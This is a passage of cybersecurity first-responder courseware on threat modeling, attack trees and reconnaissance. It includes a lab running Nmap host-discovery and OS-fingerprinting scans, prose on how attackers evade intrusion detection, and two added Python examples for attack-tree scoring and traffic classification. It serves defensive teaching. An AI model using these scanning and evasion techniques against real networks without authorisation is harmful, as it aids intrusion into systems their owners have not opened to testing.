D
or
e
at
lic
up
D
ot
N
o
D

Lesson 2: Analyzing the Threat Landscape | Topic B


Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
76 | CyberSec First Responder® (Exam CFR-410)

Summary
In this lesson, you analyzed the ever-evolving threat landscape by identifying the various
characteristics of threats to computer systems. You also performed ongoing analysis of other factors
affecting your organization's security posture. When you make the effort to understand your
opposition and adapt to it, you'll be better prepared to face security incidents.
Describe the threats that are the biggest concern to your organization or one you're familiar with. What are their skill types, motives, intentions, and so on?
A: Answers will vary. Students who work for financial companies may be predisposed to experienced cybercriminals looking to steal money from their organizations or customer accounts. Their vector of choice may be stealth based in order to avoid notice and maximize their take. Students who work for large, public-facing corporations may be more worried about attackers looking for recognition or power. In this case, the attacker may take a more overt approach to their attack. Students who work for the public sector may see hacktivists and cyberterrorists as more pressing threats. These attackers are highly motivated and often attack in a more non-targeted fashion to cause any damage they can.

What new vulnerabilities, threats, and technologies concern you the most? Why?
A: Answers will vary. Students may be concerned about the effectiveness of ransomware, especially if their employees are poorly trained on security issues. The rise of IoT technologies may not immediately impact businesses that work with only traditional computer devices, but the interconnectedness of all devices is inevitable and significantly challenging to secure. The leveraging of AI, machine learning, and other automation disciplines in both attack and defense scenarios is also quickly becoming a major source of concern.

Instructor note: Encourage students to use the social networking tools provided on the CHOICE Course screen to follow up with their peers after the course is completed for further discussion and resources to support continued learning.

Note: Check your CHOICE Course screen for opportunities to interact with your classmates, peers, and the larger CHOICE online community about the topics covered in this course or other topics you are interested in. From the Course screen you can also access available resources for a more continuous learning experience.


3 Analyzing Reconnaissance Threats to Computing and Network Environments

Lesson Time: 2 hours, 30 minutes

Lesson Introduction
Before threat actors launch their attack in earnest, they gather information. The information available to them is almost always a result of their target's behavior. The attacker simply does their own research, and suddenly they've made their job a lot easier. You need to analyze just what attackers can learn from your organization to get a better picture of what they'll attack, and how.

Lesson Objectives
In this lesson, you will:
• Implement threat modeling tools and tactics.
• Assess the impact of reconnaissance.
• Assess the impact of social engineering.


TOPIC A
Implement Threat Modeling
Before you begin assessing particular threats to the organization, you need to develop a general
strategy for modeling these threats. Threat modeling will enable you to anticipate the process of a
cyber attack, as well as provide you with a threat's impact and possible countermeasures.

The Diverse Nature of Threats
Not all threats are strictly technical. Threats may also come from sources such as poor physical controls (e.g., open or unlocked doors) or vulnerabilities to social engineering (e.g., reckless user behavior or lack of awareness). Threats may also stem from a corporate culture that disregards the importance of security, or from a lack of management support and understanding. All of these variables and more comprise a threat's tactics, techniques, and procedures, or TTPs.
While this course focuses primarily on technical TTPs, every tactic, technique, and procedure is important and should be carefully considered in the organization's risk management processes.

The Anatomy of a Cyber Attack
To begin understanding how threats can affect your systems, you must understand the actual components of a cyber attack. Security organizations have come up with several different models to break down the cyber attack to its core processes. For example, defense contractor Lockheed Martin developed its Cyber Kill Chain® to describe the anatomy of a cyber attack.
A more general anatomy of a cyber attack is:
1. Reconnaissance
The attacker collects intelligence on their target.
2. Attack
The attacker initiates the attack and compromises the target systems.
3. Post-Attack
The attacker covers their tracks and/or leaves covert exploits on the target systems as a persistent threat.

Instructor note: Ensure students understand that attacks are not always linear—they can go back and forth between the different phases.
Figure 3-1: A streamlined representation of the cyber attack process.

An Expanded Approach
The previous approach to a cyber attack can be further expanded into more distinct phases:
1. Reconnaissance
2. Scanning
3. Gaining access
4. Persistence
5. Expanding access
6. Covering tracks
Scanning is often seen as a component of reconnaissance, but it's sometimes seen as a distinct phase. In this case, reconnaissance is more passive and involves referencing public sources of intelligence, whereas scanning is more active and involves targeting private assets. The remaining phases only really apply to an intrusion-style attack. Phase three can fit in the general "attack" phase, and the phases after it can be placed under the larger umbrella of the "post-attack" phase.

More on the Cyber Kill Chain
Lockheed Martin developed the Cyber Kill Chain to reposition the advantage toward defense. Typically, the defender has the disadvantage because they must plug every security hole, whereas the attacker only needs to find one hole in the security framework to be successful. The Cyber Kill Chain tries to turn this around by helping defenders stop an attacker at any point in the chain, disrupting the attack entirely. Although this seems like an attractive model to adopt, the Cyber Kill Chain also has its weaknesses; chiefly, that it relies too heavily on traditional, perimeter-based prevention solutions. If an attacker breaches the firewall or intrusion detection system (IDS) at the perimeter, the Cyber Kill Chain can be ill-equipped to deal with the attack.
The phases of threats as defined by the Cyber Kill Chain are as follows. Keep in mind that some threats may not necessarily need all seven phases:
1. Reconnaissance
2. Weaponization
3. Delivery
4. Exploitation
5. Installation
6. Command and Control
7. Actions on Objectives


Note: For more information on the Cyber Kill Chain, visit https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html.

Threat Modeling
Threat modeling is the process of identifying and assessing the possible attack vectors that target systems. These models can encompass general security in an organization or they can apply to specific systems that are the target of an attack. In addition, some threat models are attacker focused rather than asset focused. Either way, a threat model will assist you in evaluating the risks involved in a potential attack, as well as the best course to take to mitigate its effects.
The earlier you develop an approach to respond to threats, the easier it will be to mitigate them. Security is best when it is proactive, not reactive, so waiting for an attack to happen without identifying and understanding it first will hurt your assets in the long run. Threat modeling also helps you structure security in a more comprehensive way. You can ensure that you don't miss a detail, however small, that could significantly impact your organization and its assets. Threat modeling using graphs and charts also helps you and relevant stakeholders visualize threats so they are easier to digest.

Approaches to Threat Modeling
The characteristics of a threat depend heavily on what that threat targets. Therefore, there are multiple approaches to threat modeling. The following is an example of a generic asset-focused threat modeling process:
1. Identify security objectives and requirements. What are your organization's policies and business needs?
2. Identify the architecture of the target system, including its components, roles, services, and dependencies.
3. Decompose the system further to identify how it functions and how those functions can be vulnerable. For example, how does your application ensure the confidentiality of data in transmission?
4. Identify known threats to the target system. Research exploitation databases and other sources of security intelligence.
5. Determine ways to mitigate these threats.


Figure 3-2: A general approach to threat modeling. The process is repeatable for each system you profile.

STRIDE
Security professionals that construct threat models often classify threats in terms of STRIDE. STRIDE is an acronym that stands for:
• Spoofing
• Tampering
• Repudiation
• Information disclosure
• Denial of service
• Elevation of privilege

Instructor note: You may wish to inform students of other approaches to threat modeling.

Attack Trees
Other than the general process of modeling a threat, you may also implement visual aids that more specifically outline how a threat operates. For example, assume that you have developed an app that has an instant messaging capability. As you go through your threat modeling process, you identify the threat of a malicious user intercepting messages not meant for them. To model this threat, you can create an attack tree that identifies the threat, how the threat can occur, and how to mitigate these vulnerabilities, all in an easily parsed graph.


Figure 3-3: An attack tree evaluating a man-in-the-middle threat to an instant messaging feature in an app.

Attack trees can be as simple or complex as your needs dictate. The aforementioned example is relatively simple, whereas a more complex tree will add a number of factors, including:
• Having multiple levels of attack vectors, especially if one attack vector leads to another. This establishes a parent–child relationship.
• Including all possible attack vectors as sub-nodes of the root threat.
• Assigning a probability to each attack vector node, depending on how likely it is for an attacker to use the vector.
• Differentiating between "AND" nodes and "OR" nodes, with the former requiring multiple vectors to climb to the next highest node on the tree and the latter requiring only one.
• Assigning monetary loss values to each attack vector.
• Assigning cost values to each control/mitigation node.

Note: For a more in-depth exploration of attack trees, visit https://www.schneier.com/paper-attacktrees-ddj-ft.html.
Threat Modeling Tools
There are several tools that can make the task of threat modeling easier and more productive. The following table describes some of the more common ones.

Tool: Description
Microsoft® SDL Threat Modeling Tool: A freeware tool developed by Microsoft to integrate with their Security Development Lifecycle (SDL) framework. Primarily used by software developers. It integrates the STRIDE classification.
Trike: An open source tool that also provides automation capabilities.
ThreatModeler: A tool that can pull threat information from various databases into the threat model. It also places an emphasis on easing collaboration with stakeholders. There are several editions that offer varying levels of features.
Open Source Requirements Management Tool: An open source tool intended to integrate with a systems development lifecycle (SDLC) framework. Also includes threat modeling capabilities.
CORAS Risk Assessment Platform: An open source tool designed around the CORAS model of risk assessment. Also includes threat modeling capabilities.
draw.io: A general purpose open source diagramming tool available as an online web app (https://draw.io) and also a standalone desktop application. Although not specifically designed with attack trees in mind, it can be used to easily create them.

Threat Categories
It's useful to categorize threats that have some qualitative similarities or differences. This can help guide your approach to those threats and tailor that approach to your organization's unique circumstances. This course recognizes the following threat categories:
• Reconnaissance
• Social engineering
• System hacking
• Web-based threats
• Malware
• Hijacking and impersonation
• Denial of service
• Mobile-based threats
• Cloud-based threats

Instructor note: Inform students there are other ways to categorize threats.

ACTIVITY 3-1
Analyzing a Threat Model

Data Files
C:\CNX0013Data\Analyzing Reconnaissance Threats to Computing and Network Environments\web_server_attack_tree.png
C:\CNX0013Data\Analyzing Reconnaissance Threats to Computing and Network Environments\web_server_attack_tree.drawio

Scenario
The security team wants to redesign Develetech's security from the ground up, and a big step in this process will involve understanding the threats the organization is exposed to. You'll focus on one of the more likely threats—an attack on Develetech's web servers.
You'll analyze an attack tree that maps out the different possible web-based attacks, and the suggested mitigation techniques for each. With complete and comprehensive threat models, your organization will be better prepared to defend itself against attacks in a timely and efficient manner.

Note: The attack tree is presented as images in this activity. The full attack tree is also provided in the data files as a raster image (PNG) and as an XML-based file that can be imported into the diagramming tool draw.io. You can navigate to https://app.diagrams.net to use the online web app, or download the Windows desktop version from https://github.com/jgraph/drawio-desktop.

Instructor note: Use the second, animated slide to go through the attack tree with students step by step. Time permitting, and if students show interest, consider using the draw.io app to either import the attack tree diagram and modify it based on students' answers to the questions, or create a new one from scratch. Students will learn more about specific web-based threats later, so if they are unable to provide examples, provide your own. Go to the first step of the slide animation to reveal the root node. Consider drawing attention to any subattacks or countermeasures offered by students that aren't part of the provided attack tree.

1. Examine the root node of the diagram and the web server attack that it represents.

2. Can you think of any specific attacks that might fall under the general category of web server attacks?
A: Answers will vary, as there can be many potential attacks on a web server. The diagram provided identifies three: Structured Query Language (SQL) injection attacks, cross-site scripting (XSS) attacks, and file inclusion attacks. Additional attack types include cross-site request forgery (XSRF/CSRF) attacks, directory traversal, and session hijacking.

3. Examine the tree now that several subattacks have been added.
Notice that each subattack points toward the root attack node, implying that each of these are ways in which a web server attack can be conducted.

4. Can you think of any specific countermeasures that might mitigate one or more of these subattacks?
A: Answers will vary, as there can be many countermeasures to these attacks. The diagram provided identifies three: using parameterized queries to mitigate SQL injection; limiting or sanitizing user HTML input to mitigate XSS; and creating whitelists and access identifiers to mitigate file inclusion attacks.

5. Examine the full attack tree.
Several countermeasures are now shown. An arrow points from each subattack to its corresponding mitigating tactic. The arrows are dashed instead of solid to further distinguish them from the top set of arrows.

6. What is the value in having this type of visual representation of a threat?
A: Answers may vary, but being able to visualize threats in a tree-like hierarchy can make it easier for security personnel and even non-technical stakeholders to understand the security implications of various technologies and processes that affect the organization. Attack trees are also a useful component of a larger threat modeling strategy.
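The factors listed under Attack Trees (AND/OR nodes, per-vector probabilities, loss values, and control costs) and the web server tree analyzed in this activity can be worked through in code. The following added example (not part of the course or its data files) evaluates a constructed version of the Develetech web server tree; every probability, loss and cost figure is made up for illustration.

```python
"""Attack tree evaluation with AND/OR nodes, probabilities, losses and mitigation costs.
Added example, not part of the CFR-410 course or its data files: a constructed
version of the Develetech web server tree from Activity 3-1, with made-up figures.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class Mitigation:
    name: str
    cost: float        # what the control costs the defender to put in place
    residual: float    # the vector's success probability once the control is applied


@dataclass
class Node:
    name: str
    kind: str = "OR"                   # "AND" or "OR"; ignored for leaf nodes
    probability: float = 0.0           # leaf only: chance the vector succeeds
    loss: float = 0.0                  # monetary loss if this node's attack succeeds
    children: List["Node"] = field(default_factory=list)
    mitigation: Optional[Mitigation] = None
    mitigated: bool = False            # True once the control has been applied

    def success_probability(self) -> float:
        """AND: every child vector must succeed, so probabilities multiply.
        OR: any one child suffices, so multiply the failure probabilities."""
        if not self.children:
            if self.mitigated and self.mitigation is not None:
                return self.mitigation.residual
            return self.probability
        product = 1.0
        if self.kind == "AND":
            for child in self.children:
                product *= child.success_probability()
            return product
        for child in self.children:
            product *= 1.0 - child.success_probability()
        return 1.0 - product

    def walk(self):
        yield self
        for child in self.children:
            yield from child.walk()


def expected_loss(root: Node) -> float:
    """Sum of probability x loss over every node carrying a loss figure (vectors treated as independent)."""
    return sum(n.success_probability() * n.loss for n in root.walk() if n.loss)


def rank_mitigations(root: Node) -> List[Tuple[str, float, float]]:
    """(control name, cost, reduction in expected loss) for each unapplied
    control, ordered by loss reduction per unit of cost, best first."""
    baseline = expected_loss(root)
    ranked = []
    for node in root.walk():
        if node.mitigation is None or node.mitigated:
            continue
        node.mitigated = True                      # trial application
        benefit = baseline - expected_loss(root)
        node.mitigated = False
        ranked.append((node.mitigation.name, node.mitigation.cost, benefit))
    ranked.sort(key=lambda r: r[2] / r[1], reverse=True)
    return ranked


def apply_within_budget(root: Node, budget: float) -> List[str]:
    """Greedily apply the best-value controls that fit the budget (tree updated in place)."""
    applied = []
    for name, cost, _benefit in rank_mitigations(root):
        if cost > budget:
            continue
        for node in root.walk():
            if node.mitigation is not None and node.mitigation.name == name:
                node.mitigated = True
        budget -= cost
        applied.append(name)
    return applied


def develetech_web_server_tree() -> Node:
    """Constructed tree: an OR root with the three subattacks named in the activity,
    plus an AND node for session hijacking, one of the additional attack types mentioned."""
    return Node("Web server attack", "OR", children=[
        Node("SQL injection", probability=0.30, loss=50_000,
             mitigation=Mitigation("Parameterized queries", 4_000, 0.02)),
        Node("Cross-site scripting", probability=0.40, loss=20_000,
             mitigation=Mitigation("Limit and sanitize HTML input", 2_500, 0.05)),
        Node("File inclusion", probability=0.10, loss=80_000,
             mitigation=Mitigation("Whitelist includable files", 3_000, 0.01)),
        Node("Session hijacking", "AND", loss=30_000, children=[
            Node("Steal session token", probability=0.20),
            Node("Replay token before expiry", probability=0.50,
                 mitigation=Mitigation("Short session lifetime", 1_500, 0.10)),
        ]),
    ])


if __name__ == "__main__":
    tree = develetech_web_server_tree()
    print(f"root success probability {tree.success_probability():.4f}, expected loss {expected_loss(tree):,.0f}")
    print("applied within a budget of 8,000:", apply_within_budget(tree, 8_000))
```

The ranking shows which of the activity's countermeasures buys the most risk reduction per unit of cost, which is the figure a non-technical stakeholder usually asks for once the tree itself is understood.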


TOPIC B
Assess the Impact of Reconnaissance
Now that you've implemented threat models to analyze how your systems are susceptible to attack, you can begin switching your focus to the specific threat categories. In particular, the type of threat that is often the precursor to more direct attacks is reconnaissance. Understanding reconnaissance techniques will reveal how much useful information you're unintentionally providing to malicious users.

Footprinting, Scanning, and Enumeration
Footprinting, scanning, and enumeration are the three processes that make up reconnaissance. The information revealed in these processes can aid the attacker by exposing vulnerabilities or easily exploitable vectors that can be used to attack an organization.
Footprinting is a phase in which the attacker gathers general information about a target and the people or systems that use it. The information gathered can center on the target's technology, personnel, and structuring. Footprinting is typically done with the assistance of common, public tools, rather than requiring the attacker to directly compromise an organization's hosts or network.
In the next phase, scanning is a more active way of gathering information about a target. Attackers will use scanning tools to discover information about various hosts and services running on a network. The purpose of a scan is to reveal specific information about targets. Scanning requires more direct access to a target than footprinting.
The last step of reconnaissance, enumeration, sees an attacker trying to connect to services and retrieve detailed information from those services. This can include enumerating particular networking protocols to discover how a network is structured (its topology) and how it is vulnerable. Like scanning, enumeration requires a direct interface with the target.

Instructor note: Ensure students understand that footprinting is not the same thing as fingerprinting, which is discussed shortly.

Footprinting Methods
Footprinting Methods There are several methods an attacker can use to glean preliminary information about a target:
up

• Publicly available information: With a web browser and an Internet connection, an attacker
can harvest information such as the IP addresses of an organization's Domain Name System
(DNS) servers; the range of addresses assigned to the organization; names, email addresses, and
D

phone numbers of contacts within the organization; and the organization's physical address.
These are often publicly available through Whois records, Securities and Exchange Commission
(SEC) filings, telephone directories, and more. Publicly available information is also referred to as
ot

open source intelligence.


• Dumpster diving: Attackers search through garbage to find sensitive information in paper
form. The names and titles of people within the organization enable the attacker to begin social
N

engineering to gain even more private information. This type of information is called closed
source intelligence because it is not meant to be publicly available.
o

• HTML code: The HTML code of an organization's web page can provide information, such as
IP addresses and names of web servers, operating system versions, file paths, and names of
D

developers or administrators.
• Social media: Attackers can also use social media sites like Facebook and LinkedIn to mine for
an organization's information. Depending on how much an organization or an organization's
employees choose to share publicly, an attacker may find posts or user profiles that give away
sensitive information or simply act as another vector or target for the attacker to take advantage
of.

Lesson 3: Analyzing Reconnaissance Threats to Computing and Network Environments | Topic B


Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 87

• Search engines: Attackers targeting web applications can use search engines like Google™ and
Bing® to do their footprinting for them. These search engines can reveal much about web apps,
including domain information for where an app is hosted and the web technology it uses. The
attacker executes an automated script that runs queries on the search engine for a specific web
app, which then filters results by relevance.
• Metadata: Attackers can run metadata scans on publicly available documents using a tool like
Fingerprinting Organizations with Collected Archives (FOCA). For example, Microsoft Office
documents posted on the Internet may not directly divulge sensitive information about an
organization, but an attacker could glean useful information from their metadata, including the
names of authors or anyone who made a change to the document. By using search engines such
as Google and Bing, FOCA can also cross-reference files with other domains to find and extract
metadata.

Figure 3-4: Using FOCA to search Google.com for PDF metadata.



Network and System Scanning Methods



Attackers can employ various methods in scanning networks and systems. They may:
• Look for open ports. Open ports may present an attacker with a vector they can use to target a
host.
• Look for network access points. These may present an attacker with an opening to the network,
or the attacker may shut them down in a denial of service (DoS) attack.
• Find applications that are listening on certain ports. An attacker can target the listening software
on a host and cause considerable damage.
• Identify technology used to construct web apps, such as JavaScript, that is known to be highly
vulnerable to various attacks.
• Discover network ranges. This can help an attacker identify which hosts are mapped to which
logical area of the network, or it may even reveal their physical location.
• Identify the operating environment of network hosts. This can make it easier for an attacker to
craft an operating system–specific attack.
• Scan network and system logs for information. Logs may reveal a great deal about how a
particular application, operating system, or device functions, as well as reveal current
configurations.


• Scan access control lists (ACLs) used by routers and firewalls. An attacker can use ACLs to
determine which pathways will be ineffective and which will grant them the access they seek.
Network scans manipulate the three-way handshake to gather their information:
1. Attacker A sends a synchronization request packet to Target B (SYN).
2. Target B sends an acknowledgement of this request back to Attacker A (SYN-ACK).
3. Attacker A sends an acknowledgement back to Target B (ACK).

Note: A SYN request without a resulting acknowledgement (ACK) implies that the target did
not accept the packet.

Figure 3-5: A scanning tool (Vega) detecting the presence of AJAX in a web app.

Enumeration Methods

Attackers use enumeration to map a network. They can do this in several ways, including:
• Querying Domain Name System (DNS) servers. DNS servers are common reconnaissance
targets because, if not properly secured, they can provide a detailed map of an organization's
entire network infrastructure.
• Enumerating Simple Network Management Protocol (SNMP) devices on a network. A poorly
secured SNMP service may enable an attacker to configure a device maliciously.
• Discovering a host's NetBIOS name. This can lead an attacker to identify a particular host.
• Establishing a NetBIOS null session. This can enable an attacker to connect to a remote host
without a user name and password, where they can view information about policies, groups, and
other domain information.
• Enumerating domain directories like Active Directory. If an attacker identifies a poorly secured
user account or network share, they can use this to take advantage of other systems. They can
also crawl directory services to enumerate email accounts, which is useful in a variety of attacks.
• Enumerating applications that run on web servers, like Microsoft's Internet Information Services
(IIS). This enables the attacker to craft their exploits to target certain web server software.
• War driving to identify wireless networks in range of a moving vehicle.
• Fingerprinting hosts to determine their operating systems and other details and characteristics.
A malicious executable for one operating system may not work on another, so an attacker must
know their targets' platforms.

Figure 3-6: Using Nmap to enumerate networking information.

Variables Affecting Reconnaissance
The exact tools and methods an attacker uses for reconnaissance, as well as how effective they are,
will vary depending on the following major factors:
• Wireless vs. wired: Wired connections will limit an attacker's ability to sniff traffic transmitted
outside their own connected host unless they are able to configure the switch or router to
forward all traffic to their host. In a wireless network, the attacker will be able to sniff every node
connected to the access point. However, in most secure environments, the network will be
configured with an encryption scheme like Wi-Fi Protected Access 2 (WPA2) or WPA3. This can
prevent the attacker from reading a packet's contents, unless the attacker is able to capture the
authentication handshakes between a node and the access point. Ultimately, the type of network
can limit the reach of a reconnaissance attempt, as well as its effectiveness in gathering usable
information.
• Virtual vs. physical: Virtual systems may be set up as a sandbox used to foil the attacker; if
properly segmented, the attacker will learn very little, or they may end up operating under false
assumptions about how the network and its hosts are configured. Still, some organizations
virtualize quite a bit of their infrastructure, so the attacker may be able to discover valuable
information without needing to engage in physical reconnaissance. Depending on the attacker's
relationship with their target, they may be able to gain physical access to an organization and
scout its various devices and appliances.
• Internal vs. external: As you've seen, insiders are often at an advantage when it comes to
valuable knowledge about how an organization operates. If they already have the information
that will enable them to launch a successful attack, then they may not need to engage in the kind
of deep reconnaissance that will put their attack at risk of being discovered. External actors, on
the other hand, will often have a more difficult and drawn-out reconnaissance phase. However,
the advantage is not always in the insider's favor; any reconnaissance they actually do could be
more easily traced back to them. An external actor, on the other hand, may be more effective at
shielding themselves with anonymity.
• On-premises vs. cloud: Many organizations are ill equipped to secure their operations against
attack. Attackers can perform reconnaissance on insecure on-premises systems with relative ease.
If an organization's infrastructure is hosted in the cloud, on the other hand, they may be unable
to penetrate the cloud vendor's security. Still, security-minded organizations will have full control
over their on-premises systems. In a cloud environment, the organization is often at the mercy of
the provider, and must trust they will adequately protect the organization's assets. This trust is


often misplaced, especially since cloud providers are huge targets that store sensitive data for
many different organizations.

Instructor note: Consider mentioning that the interface between cloud provider and client can also affect
reconnaissance.

How Attackers Evade Detection During Reconnaissance

Organizations typically employ a network-based intrusion detection system (NIDS) to detect
technical reconnaissance mechanisms like scanning and enumeration. An NIDS employs different
methods of detection, but one of the most common methods is through signature analysis.
Signature analysis is similar to its use in anti-malware software in that it compares an action against
known attack properties, and if these match, it produces an alarm. There are, however, ways that
attackers bypass signature-based network intrusion detection:
• The attacker obfuscates their network packets so the NIDS will be unable to match its signature
with known values. The packets might include extra, irrelevant characters or characters that
perform the same function but in different ways. The effectiveness of this technique will depend
on the strength of the NIDS, as newer systems may be smart enough to interpret these attempts
at obfuscation.
• If traffic across the network is encrypted, the NIDS will be unable to analyze its contents in most
cases. Attackers can use this to their advantage by allowing their reconnaissance efforts to be
encrypted.
• The attacker may also take a more aggressive approach by initiating a DoS on the NIDS. Like
other network devices and technology, a NIDS flooded with too much traffic will be unable to
perform its duties, rendering it useless in detecting a reconnaissance attempt.
• The attacker may be able to avoid notice entirely if they perform reconnaissance exclusively
through public sources. In this case, the attacker is not at risk of being detected, or is at least
shielded from detection since anyone can access these public sources.

Instructor note: Ensure students know there are techniques for inspecting encrypted transmissions, so this
evasion technique is not always effective.
e
Reconnaissance Tools

The following are examples of popular tools attackers may use for reconnaissance.

Instructor note: As time permits, consider demonstrating some of these tools or navigating to the sites that
host them.

Footprinting tools
• Whois
• nslookup
• dig
• Recon-ng
• FOCA
• Maltego
Scanning tools
• Nmap®
• ping
• tracert
• netstat
• Netcat
• Snort®
• Vega
Enumeration tools
• Nmap
• Nessus®
• snmpwalk
• smbmap
• nbtscan


• Cain & Abel

Additional Tools
Almost every security or attack tool that reveals some kind of information about a target can be
used in reconnaissance. For example, vulnerability scanners; intrusion detection/prevention systems
(network and host based); security information and event management (SIEM); network appliance
logs (e.g., rule-based firewall logs); system logs (e.g., syslogs); and more are always potential
components of an attacker's reconnaissance suite.

Packet Trace Analysis

Packet trace analysis, also known as traffic analysis, is one of the most powerful techniques for
detecting and assessing reconnaissance threats, as well as many other types of cyber attacks.
The contents and metadata of captured packets can reveal a lot, but even by just looking at general
flow patterns of packet traffic, you can be tipped off to a potential problem. Packet trace analysis
can reveal insights without digging into packet content, such as when the packet contents are
encrypted. For example, a brief exchange of small payloads with consistent pauses between each
packet might imply an interactive session between two hosts, whereas sustained streams of large
packets might imply a file transfer. This is not much to go by on its own, but combined with other
sources, packet trace analysis can reveal useful information.
Clues derived from packet trace analysis might help an intruder, but they are also quite useful for
defensive monitoring and security intelligence analysis. Over time, your monitoring system can
establish baselines of traffic patterns. Then anomalies that deviate from those patterns can help to
reveal potential problems.
In some regards, command-line tools, such as tcpdump, are convenient for packet trace analysis
because they are often present within the operating system, can be driven by scripts, and produce
structured content that can be processed by scripts. So they are geared toward quick-and-dirty
manual analysis or automated (script-driven) analysis, but they typically do not provide the advanced
analysis features included in a graphical tool such as Wireshark.

Instructor note: Packet Trace Analysis (2 Slides). Students will be using Wireshark in the upcoming activities.
However, consider briefly demonstrating the tool here.
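The size-and-timing heuristics described above can be automated. The following is an added example (not from the courseware): it profiles each flow in a constructed trace of (timestamp, src, dst, payload_bytes) records and checks per-host volume against a constructed baseline; the thresholds are illustrative assumptions, not values from the text.

```python
"""Infer what a session is doing from packet sizes and timing alone.

Added example, not from the CFR courseware. Small, regularly paced payloads
are taken to suggest an interactive session and sustained large segments a
file transfer; no payload is ever inspected, so this works on encrypted
traffic too. Thresholds are illustrative choices.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed trace: an interactive exchange between 10.39.5.6 and 10.39.5.2
# (one small packet a second, alternating direction), then a bulk transfer
# from 10.39.5.2 to 10.39.5.10 (full 1460-byte segments, 2 ms apart).
INTERACTIVE = [
    (i * 1.0,
     "10.39.5.6" if i % 2 == 0 else "10.39.5.2",
     "10.39.5.2" if i % 2 == 0 else "10.39.5.6",
     48 + (i % 4) * 16)
    for i in range(10)
]
BULK = [(5.0 + i * 0.002, "10.39.5.2", "10.39.5.10", 1460) for i in range(40)]
TRACE = INTERACTIVE + BULK

# Constructed baseline: typical bytes sent per host in a window this long,
# as a monitoring system would learn over time.
BASELINE_BYTES = {"10.39.5.2": 15000, "10.39.5.6": 2000, "10.39.5.10": 500}


def flows(trace):
    """Group records by the unordered pair of hosts, keeping capture order."""
    out = defaultdict(list)
    for ts, src, dst, size in trace:
        out[tuple(sorted((src, dst)))].append((ts, size))
    return out


def flow_profile(records):
    """Size and timing statistics for one flow."""
    times = [t for t, _ in records]
    sizes = [s for _, s in records]
    gaps = [b - a for a, b in zip(times, times[1:])]
    return {
        "packets": len(records),
        "mean_payload": mean(sizes),
        "mean_gap": mean(gaps) if gaps else 0.0,
        "gap_jitter": pstdev(gaps) if len(gaps) > 1 else 0.0,
    }


def classify_flow(profile):
    """Label a flow from its profile."""
    if profile["packets"] < 4:
        return "too-short"
    small = profile["mean_payload"] < 200
    large = profile["mean_payload"] > 1000
    # "Consistent pauses": gaps that are long and roughly regular.
    paced = (profile["mean_gap"] > 0.2
             and profile["gap_jitter"] < 0.5 * profile["mean_gap"])
    rapid = profile["mean_gap"] < 0.05
    if small and paced:
        return "interactive"
    if large and rapid:
        return "bulk-transfer"
    return "unclassified"


def classify_trace(trace):
    """{(host_a, host_b): label} for every flow in the trace."""
    return {key: classify_flow(flow_profile(recs))
            for key, recs in flows(trace).items()}


def baseline_anomalies(trace, baseline_bytes, factor=3.0):
    """Hosts whose bytes sent exceed `factor` times their baseline.

    A host absent from the baseline has a baseline of 0, so any traffic
    from it is reported: an unknown talker is itself worth a look.
    """
    sent = defaultdict(int)
    for _, src, _, size in trace:
        sent[src] += size
    return {host: total for host, total in sent.items()
            if total > factor * baseline_bytes.get(host, 0)}


if __name__ == "__main__":
    for pair, label in classify_trace(TRACE).items():
        print(f"{pair[0]} <-> {pair[1]}: {label}")
    print("volume anomalies:", baseline_anomalies(TRACE, BASELINE_BYTES))
```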
Figure 3-7: Packet trace analysis with Wireshark.


ACTIVITY 3-2
Performing Reconnaissance on a Network

Before You Begin

You'll be using Kali Linux™, an operating system designed to support experts in many different
areas of security. Kali Linux comes pre-packaged with hundreds of open source tools, including
Nmap, a network scanner.
You will run Kali Linux as a virtual machine (VM) using Oracle's VirtualBox software, with your
Windows® 10 computer as the host. VirtualBox and the Kali Linux VM have already been installed
and configured. You will also be targeting your other computer, a Windows Server® 2019 domain
controller.

Scenario

You want to see how attackers can execute a reconnaissance attack. You'll scan your network and
hosts to see the kind of useful intelligence an attacker can glean. Understanding the nature of these
reconnaissance threats will enable you and your team to eliminate weaknesses in your network that
reveal too much information.

Instructor note: Be sure to provide students with the IP addresses to their Windows 10 client, Kali Linux VM,
and Windows Server 2019 machine.

1. Start Kali Linux and Nmap.
a) From the desktop, double-click the Oracle VM VirtualBox shortcut.

Note: If a message box pops up telling you a new version of VirtualBox has
been released, select OK.

b) In the Oracle VM VirtualBox Manager window, with the CFR-Kali VM profile selected, select Start.

c) Close any of the warning bars at the top of the screen.


d) At the login screen, enter kali as the user and kali as the password.


e) From the Kali Linux desktop, select the Terminal Emulator icon on the top-left panel.

f) At the terminal command prompt, enter nmap

Caution: Commands in Unix-like systems are case sensitive. Be mindful of
how you type.

g) Examine the options for Nmap. Scroll up and, under HOST DISCOVERY, find the options to conduct
a ping scan to discover hosts.


2. Under HOST DISCOVERY, what option runs a simple ping scan?
A: nmap -sn

3. Under SCAN TECHNIQUES, what option runs a TCP Connect() scan?
A: nmap -sT

4. Under OS DETECTION, what is the option to run an operating system
discovery scan?
A: nmap -O


5. Under OUTPUT, what does the -v option mean in Nmap?
A: More verbose responses for more detail in the scan.

6. View the Nmap manual.


a) At the command prompt, enter man nmap to view the complete manual for the tool.

Note: You can get similar results by going to nmap.org.

b) Skim the description of Nmap and verify its command-line syntax under the SYNOPSIS section.

c) When you're finished, press q to quit the manual.

7. Using what you've learned about Nmap, run a ping scan against your local
network.
a) At the command prompt, enter sudo nmap -sn 10.39.5.0/24

Note: In order to detect the Windows Server machine, Nmap must be run with
superuser (root) privileges. This is what the sudo command does.

b) When prompted to enter the password, enter kali

Note: By default, when running a command with sudo, the system will prompt
you for a password every five minutes. You can enter the kali password any
time you're prompted throughout the course.

Instructor note: If your network setup is different, provide students with the IP range of the classroom
computers.


c) Note the number of hosts identified by the scan.
Your client, server, and the network router should be revealed. The total number of hosts will
depend on your classroom network.

Instructor note: Encourage students to share the number of hosts they found.

8. Run operating system discovery scans using Nmap.
a) Run an operating system discovery scan against your server in verbose mode.

Note: Remember to prefix this command and the following commands with
sudo so they execute with root privileges.

Instructor note: The command that students should run for step 8a is sudo nmap -O -v 10.39.5.#, where # is
the last number in their server's IP address. Adjust the IP address, if necessary. If at any time students
forget to use sudo, they can rerun the last entered command with root privileges by entering sudo !!

b) Now run the same scan against your router.

Note: You can press the Up Arrow on your keyboard to display the command
you last entered.

